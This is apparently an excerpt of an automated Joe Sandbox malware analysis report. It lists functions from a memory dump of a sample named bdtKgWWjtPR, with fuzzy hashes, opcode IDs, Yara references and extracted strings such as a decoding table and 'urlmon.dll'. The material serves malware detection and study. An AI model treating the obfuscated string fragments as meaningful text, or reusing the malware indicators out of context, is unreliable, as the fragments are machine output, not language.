                                                                                                  • Opcode Fuzzy Hash: 84e4f580c2f966e9f9b07fc989e96498ad32f0c506480f3c6e51f6e36c57b017
                                                                                                  • Instruction Fuzzy Hash: 8D0180B2214508BBDB54DE99DC81EEB77ADAF8C714F508209FA09A7244D730F9518BA4
                                                                                                  Function 0416D339 Relevance: .0, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: aeabe67e95d191c17807460aaeafe0ec19abb320063cd6a4c2b2134539914ae2
                                                                                                  • Instruction ID: 64cbd3b411754d8aaa45962a0fde7c89063bb56af8413c8fb8e00c2e4438f49f
                                                                                                  • Opcode Fuzzy Hash: aeabe67e95d191c17807460aaeafe0ec19abb320063cd6a4c2b2134539914ae2
                                                                                                  • Instruction Fuzzy Hash: 1501DBF2D1121DAFCB40DFE8D9419EEBBF9AB48200F14426AD905F7240E7745A04CFA5
                                                                                                  Function 0414BF39 Relevance: .0, Instructions: 40COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 53e50d2880b3af2f332f6aa196373ca2cdd4e5c4c21b40c57cd5324490a35bf4
                                                                                                  • Instruction ID: 50e354948ddc8528a0f4bd6ada5ca50d9b110eb325699e850c529f48052581d6
                                                                                                  • Opcode Fuzzy Hash: 53e50d2880b3af2f332f6aa196373ca2cdd4e5c4c21b40c57cd5324490a35bf4
                                                                                                  • Instruction Fuzzy Hash: 1BF0A773604216ABD7105AAEACC0B86F79CEBC5334F240222FD1CC7251E771F45286B0
                                                                                                  Function 04160012 Relevance: .0, Instructions: 38COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 5c2e3192aa24884ec3acbff5a2ab8b364e14beb4b86126290fddc64c50488910
                                                                                                  • Instruction ID: b2f79affd32b36d2899a2df016c10aefbc61a366be749f3e02e846d3b975f9fe
                                                                                                  • Opcode Fuzzy Hash: 5c2e3192aa24884ec3acbff5a2ab8b364e14beb4b86126290fddc64c50488910
                                                                                                  • Instruction Fuzzy Hash: 16F0FCB5C46359AFEF11EF64CC88EAA7B789F95214F0043C9E80497151DB315A46C7D0
                                                                                                  Function 041708E9 Relevance: .0, Instructions: 33COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: e61af1ff2d637d5650b34679ac960791de74a5457d5976a0e18ada484b418205
                                                                                                  • Instruction ID: 83fe3e990617126a0b68c996721a1e792f27fcaf4bbf078ab540f280246545bf
                                                                                                  • Opcode Fuzzy Hash: e61af1ff2d637d5650b34679ac960791de74a5457d5976a0e18ada484b418205
                                                                                                  • Instruction Fuzzy Hash: 2EF01CB5640204BBD710EE99DC85E9B77ACEFC8714F004509F91897241D770B9518BB4
                                                                                                  Function 041715A9 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction ID: 9a6696bdd87d1048b2424ade594c74843b1069d7b5e97a3393df05c2e24b3923
                                                                                                  • Opcode Fuzzy Hash: 0681289463acc3cc7b52d519a9f1f540006482d51675ae265bd9054e089dee02
                                                                                                  • Instruction Fuzzy Hash: 8DE092B2240304BBD614EE69EC81FAB37ACEFC9714F104419F919A7242D730B91087B4
                                                                                                  Function 0414BF32 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 347d857568fb5e9bee7deb4e931ac0eb44ef0b06687ca2ccad6c420ebb46dad1
                                                                                                  • Instruction ID: dbf1836e67406ff54ee7c5c611957f38e2d32a2cdd9da1be223f6622abaabca5
                                                                                                  • Opcode Fuzzy Hash: 347d857568fb5e9bee7deb4e931ac0eb44ef0b06687ca2ccad6c420ebb46dad1
                                                                                                  • Instruction Fuzzy Hash: F4E04F33508226AB871459AE9C849C6F7DCEA9A3317251222E86C97650D631E85386E0
                                                                                                  Function 0415FF79 Relevance: .0, Instructions: 29COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: a9b7f4ec5b3efd2b72518faff0def773237a841f76f456650df5c183434308b4
                                                                                                  • Instruction ID: b168fb03cd37f42f4701912284b9bc38fb511791d949159aceb26bc0a688d6e5
                                                                                                  • Opcode Fuzzy Hash: a9b7f4ec5b3efd2b72518faff0def773237a841f76f456650df5c183434308b4
                                                                                                  • Instruction Fuzzy Hash: 84F08971815208EBDB14CF64D8817DDBB74EB05320F10436AE824972C0D73497558741
                                                                                                  Function 04173429 Relevance: .0, Instructions: 28COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: daeb31a5d26c7c7d0447e5918d7d8fec868782d96e51e471d2bd42bcc7eedab4
                                                                                                  • Instruction ID: 8d390d54aa1bd6e2231c67ad5fc873898de5b1c1d25921e0d69df21743e51e57
                                                                                                  • Opcode Fuzzy Hash: daeb31a5d26c7c7d0447e5918d7d8fec868782d96e51e471d2bd42bcc7eedab4
                                                                                                  • Instruction Fuzzy Hash: 1DE0DF32A8122877D22516899C45F9B77AC8BC5E20F140064FF189B380E661B90082E1
                                                                                                  Function 0415FF76 Relevance: .0, Instructions: 26COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 9e20fb91b1a8b693fee14a770cdb23ca020879d64b4c1d757bc0a4b5e8bdf045
                                                                                                  • Instruction ID: da1bdbc4e3aa320b9780c2757f2f26ecd4421fd0f1b10392ffa24483440f3dd4
                                                                                                  • Opcode Fuzzy Hash: 9e20fb91b1a8b693fee14a770cdb23ca020879d64b4c1d757bc0a4b5e8bdf045
                                                                                                  • Instruction Fuzzy Hash: 09F06571915108EBDB14DF64E882ADDBB74DB09310F1047AEEC24DB280E735DB658741
                                                                                                  Function 0414BFAF Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 7235f63bce147dc4aad164520cda8a3d1efe7bc3a2ad8e97900822699cf459f2
                                                                                                  • Instruction ID: 90a0da79e8aa981ae773ad3986dd5e6b4f5f7ec7ad9a7403b2fdd8e1bc365304
                                                                                                  • Opcode Fuzzy Hash: 7235f63bce147dc4aad164520cda8a3d1efe7bc3a2ad8e97900822699cf459f2
                                                                                                  • Instruction Fuzzy Hash: 47E0CD33518112AB8714496D6CC04D6F798EBD93303210322E86C87150D731F41286B0
                                                                                                  Function 04171289 Relevance: .0, Instructions: 25COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction ID: 2570e93f0aec4ceb1ad7f47014266a92e237877494ba15027a15c2f88a7a8bd2
                                                                                                  • Opcode Fuzzy Hash: 8c432eb5109c663c6e388c646d9d9885cabc588ea9dd12fc9b3944e72242aa06
                                                                                                  • Instruction Fuzzy Hash: B5E04F762402047BD210EA6ADC41ED777ACDFC5614F104419FA086B141D6717A0186F1
                                                                                                  Function 04152D43 Relevance: .0, Instructions: 11COMMON
                                                                                                  Download Yara Rule
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID:
                                                                                                  • API String ID:
                                                                                                  • Opcode ID: 3e93581a8a5811cb4406b933b7e1144a3c217d45ebb67ee7dcb288f5d75f6f46
                                                                                                  • Instruction ID: 934da28f4c5d5d485764f3f2e3ad9730da4bd7ea66f073ab07edff09b0399b62
                                                                                                  • Opcode Fuzzy Hash: 3e93581a8a5811cb4406b933b7e1144a3c217d45ebb67ee7dcb288f5d75f6f46
                                                                                                  • Instruction Fuzzy Hash: A5B022B3A08020AE080022202AC30AA3E02880F02038000E0AC80FB082EB802880A8C3

                                                                                                  Non-executed Functions

                                                                                                  Function 0415BCFB Relevance: 51.4, Strings: 41, Instructions: 173COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  • Opcode ID: cd57f9b763bcb5d81190df786055b7dcc7689b19f860ee5c7291b69686b6cea2
                                                                                                  • Instruction ID: a74481ee499aa7463057f006cdc13beae2ac00e151d6f55d1cdd1d98fc5fe5ab
                                                                                                  • Opcode Fuzzy Hash: cd57f9b763bcb5d81190df786055b7dcc7689b19f860ee5c7291b69686b6cea2
                                                                                                  • Instruction Fuzzy Hash: BF91FEF08052A98ACB118F55A5603DFBF71BB95304F1581E9C6AA7B243C3BE4E85DF90
                                                                                                  Function 0415BD09 Relevance: 51.4, Strings: 41, Instructions: 166COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !"#$$%&'($)*+,$-./0$123@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@$@@@@@@@@$@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@@>@@@?456789:;<=@@@@@@@
                                                                                                  • API String ID: 0-3248090998
                                                                                                  • Opcode ID: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                  • Instruction ID: e838d1a9e933beadfdba4d246d31e47f85fcb60b31042988780ac8deecefd7f5
                                                                                                  • Opcode Fuzzy Hash: 88d2f9759e5af378ae688ea4fd5311552ce04c6e866e263db9e13d76fe42414d
                                                                                                  • Instruction Fuzzy Hash: 1F910FF08052A88ACB118F55A4603DFBF71BB85304F1581E9C6AA7B203C3BE4E85DF90
                                                                                                  Function 0414BAB9 Relevance: 37.6, Strings: 30, Instructions: 54COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: (-<v$(osj$(tn`$+fww$+njf$4<v:$4<v:7)0$7)0$:7)?$<q:e$>+nj$`b(p$b(fw$bew+$f`b($fi`b$fqna$fsnh$fwwk$i`+-$ibc*$k+fw$kndf$ndfs$nhi($njf`$sjk,$snhi$v:7)$wknd
                                                                                                  • API String ID: 0-1649002233
                                                                                                  • Opcode ID: d3b96e223c06e2752df67df052f4649edcbd0643358b2d81e4d12a206943f831
                                                                                                  • Instruction ID: 804a63a4b30c9df7bf0370598056694121654f7f9acbe258003ec0adb250be55
                                                                                                  • Opcode Fuzzy Hash: d3b96e223c06e2752df67df052f4649edcbd0643358b2d81e4d12a206943f831
                                                                                                  • Instruction Fuzzy Hash: 5631CBB0C09248DBCF24DFD2EA8579DBF70FB00B44F608648D458AB289DB745A568F55
                                                                                                  Function 0416A8A9 Relevance: 34.0, Strings: 27, Instructions: 264COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $$$$%$)$)$.$5$>$B$E$F$F$H$J$Q$T$g$h$i$m$s$u$urlmon.dll$v$w$}$}
                                                                                                  • API String ID: 0-1002149817
                                                                                                  • Opcode ID: 96f489eda3da294dbc635209662f49f93d6176830c60a4f58e83c1800f3b2728
                                                                                                  • Instruction ID: fe767154e1f8d93b6b38dfd577d08e10197d9d8669d12507e3533faa15c69d89
                                                                                                  • Opcode Fuzzy Hash: 96f489eda3da294dbc635209662f49f93d6176830c60a4f58e83c1800f3b2728
                                                                                                  • Instruction Fuzzy Hash: 76C123B1C0022C9AEB61DFA5DC84BEEBBB8AF45344F0041DAD51CB7241E7B55A88CF91
                                                                                                  Function 041676D9 Relevance: 25.2, Strings: 20, Instructions: 250COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $2$I$I$\$e$g$i$l$l$m$o$r$r$r$r$t$t$t$x
                                                                                                  • API String ID: 0-3236418099
                                                                                                  • Opcode ID: 42e7162c1ea755d2991232b04dccb66cbbbbb8c794c7e07be1f4b6177c336b6d
                                                                                                  • Instruction ID: 9e5862240470c04966c1bae71e6f14d85e1e5f04d23900ec4e959328d46d5f5d
                                                                                                  • Opcode Fuzzy Hash: 42e7162c1ea755d2991232b04dccb66cbbbbb8c794c7e07be1f4b6177c336b6d
                                                                                                  • Instruction Fuzzy Hash: A39142B1911218AEEB20DF95DD84FEEB7BDEF44308F004199EA1CA6140E7756B58CFA1
                                                                                                  Function 04152394 Relevance: 22.6, Strings: 18, Instructions: 122COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: ?$ T$#$%$'L$(8$+$,)$8$=<$A$A$B$L0$aQ$l$uA${e
                                                                                                  • API String ID: 0-4261188412
                                                                                                  • Opcode ID: caa0b25ffae8f8bc96094d41acb10d1e8fafd992d661136e56ab6cb9d6209469
                                                                                                  • Instruction ID: b014e15f4f5b8c79bbfe74f7efa450ed855017becea643cdba297b290833399a
                                                                                                  • Opcode Fuzzy Hash: caa0b25ffae8f8bc96094d41acb10d1e8fafd992d661136e56ab6cb9d6209469
                                                                                                  • Instruction Fuzzy Hash: 739138B0D05369CBEB60CF81C9987DEBBB1BB45308F1085D9D5583B281C7BA0A89CF95
                                                                                                  Function 04162E59 Relevance: 16.4, Strings: 13, Instructions: 194COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  • Opcode ID: 2eea0d4096eb5820ead4777edf8c7060e91d019706c736714fc3f9780bada823
                                                                                                  • Instruction ID: 4974ffc09d80caadb835cd9b5ae722e5c0ef12321a48c91adbdda8d06cb95ecc
                                                                                                  • Opcode Fuzzy Hash: 2eea0d4096eb5820ead4777edf8c7060e91d019706c736714fc3f9780bada823
                                                                                                  • Instruction Fuzzy Hash: 4E710CB1C10218EAEB25DFA4CC81FEEB778BF08704F44419DE919A6140EBB56749CFA5
                                                                                                  Function 04162E51 Relevance: 16.4, Strings: 13, Instructions: 179COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: $.$F$P$e$i$l$m$o$o$r$s$x
                                                                                                  • API String ID: 0-392141074
                                                                                                  • Opcode ID: dc4ebc1f81a532655a63656b165fa711931e2893ff76486b2b887aee0294b45e
                                                                                                  • Instruction ID: 304132c8c8247d327388be50716864b40d4be5375506101c313cbc73293ebdd0
                                                                                                  • Opcode Fuzzy Hash: dc4ebc1f81a532655a63656b165fa711931e2893ff76486b2b887aee0294b45e
                                                                                                  • Instruction Fuzzy Hash: 09611CB1C10218EAEB25DFA4CC81FEEB778BF08704F04419DE519A6140EBB56749CFA5
                                                                                                  Function 0414BBE7 Relevance: 16.3, Strings: 13, Instructions: 51COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$N$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-1516369116
                                                                                                  • Opcode ID: f713c6f888110b557d52e9472ecc4e59cdec60101f86e59ebd17c4de030e91e7
                                                                                                  • Instruction ID: 73d8091d9b04feb5a94d19c7ebccd9cf2e3e89d9d92b97af22b227598ccedc10
                                                                                                  • Opcode Fuzzy Hash: f713c6f888110b557d52e9472ecc4e59cdec60101f86e59ebd17c4de030e91e7
                                                                                                  • Instruction Fuzzy Hash: CD2143B0C1525C9FCB10DFC1E581AADBB70FB05380F209048C6256F269C7766A56CF89
                                                                                                  Function 0414BBE9 Relevance: 16.3, Strings: 13, Instructions: 46COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: !9=+$'"+$+ c;$+<<7$<av`$=unw$N$`~`{$`~`~$w~~a$}|un$~`{}$~`~n
                                                                                                  • API String ID: 0-1516369116
                                                                                                  • Opcode ID: f07591acca17ce7e7c2f3aa487bbf93a1d2bf43243502341ec4a637f19ae8f64
                                                                                                  • Instruction ID: 23bef02bebfeb92c035a0915238376abf152bf60985e6312b0c22e38c9b70d5e
                                                                                                  • Opcode Fuzzy Hash: f07591acca17ce7e7c2f3aa487bbf93a1d2bf43243502341ec4a637f19ae8f64
                                                                                                  • Instruction Fuzzy Hash: E321EEB0C1135C9BCB10DFC6EA816EDBB74BB14380F208108D6156F268C7B61A42CF89
                                                                                                  Function 04156AF9 Relevance: 13.8, Strings: 11, Instructions: 84COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  • Opcode ID: 3686b71c0c6b305bd8c7af9d32ec5d5122f5295783d73b2be9056ad231e00474
                                                                                                  • Instruction ID: 15621ed9658e46c540e049b8cd3a0853698141ba3f64f7505966099e0796f35a
                                                                                                  • Opcode Fuzzy Hash: 3686b71c0c6b305bd8c7af9d32ec5d5122f5295783d73b2be9056ad231e00474
                                                                                                  • Instruction Fuzzy Hash: 502185B5D5021CEAEF54DFD4CC85BEEBBB9AF08704F00415DEA18BA180DBB55648CBA4
                                                                                                  Function 04156AF0 Relevance: 13.8, Strings: 11, Instructions: 80COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: D$\$e$e$i$l$n$r$r$w$x
                                                                                                  • API String ID: 0-685823316
                                                                                                  • Opcode ID: a51c36024dc03f01e22d5f26f3c77a97c5a1e8d45458d084cca0e5e7954bf861
                                                                                                  • Instruction ID: fca2133167f51e4616793b09963596b7d6619c62e29a77056b7bfe155ee9dc36
                                                                                                  • Opcode Fuzzy Hash: a51c36024dc03f01e22d5f26f3c77a97c5a1e8d45458d084cca0e5e7954bf861
                                                                                                  • Instruction Fuzzy Hash: 862153B5D50218EAEF54DFD0CC85BEEBBB9AF08704F04415DEA18BB180DBB55648CBA4
                                                                                                  Function 04167B99 Relevance: 12.8, Strings: 10, Instructions: 342COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: :$:$:$A$I$N$P$m$s$t
                                                                                                  • API String ID: 0-2304485323
                                                                                                  • Opcode ID: 884e3c200c091dab388169dc8bd11e5214fd07817de6a66ec5f4173863536ce2
                                                                                                  • Instruction ID: a7366584f8726e77661ff73d6f53d1785f250b196e76198bb5adf630f18638e6
                                                                                                  • Opcode Fuzzy Hash: 884e3c200c091dab388169dc8bd11e5214fd07817de6a66ec5f4173863536ce2
                                                                                                  • Instruction Fuzzy Hash: C0D1C9B1910709ABEB14EFE5DC81FEEB7F8AF48308F04451DE529D6244E778AA45CB60
                                                                                                  Function 0415DF29 Relevance: 10.1, Strings: 8, Instructions: 131COMMON
                                                                                                  Download Yara Rule
                                                                                                  Strings
                                                                                                  Memory Dump Source
                                                                                                  • Source File: 00000007.00000002.2977492611.00000000040A0000.00000040.00000001.00040000.00000000.sdmp, Offset: 040A0000, based on PE: false
                                                                                                  Joe Sandbox IDA Plugin
                                                                                                  • Snapshot File: hcaresult_7_2_40a0000_bdtKgWWjtPR.jbxd
                                                                                                  Yara matches
                                                                                                  Similarity
                                                                                                  • API ID:
                                                                                                  • String ID: .$P$e$i$m$o$r$x
                                                                                                  • API String ID: 0-620024284
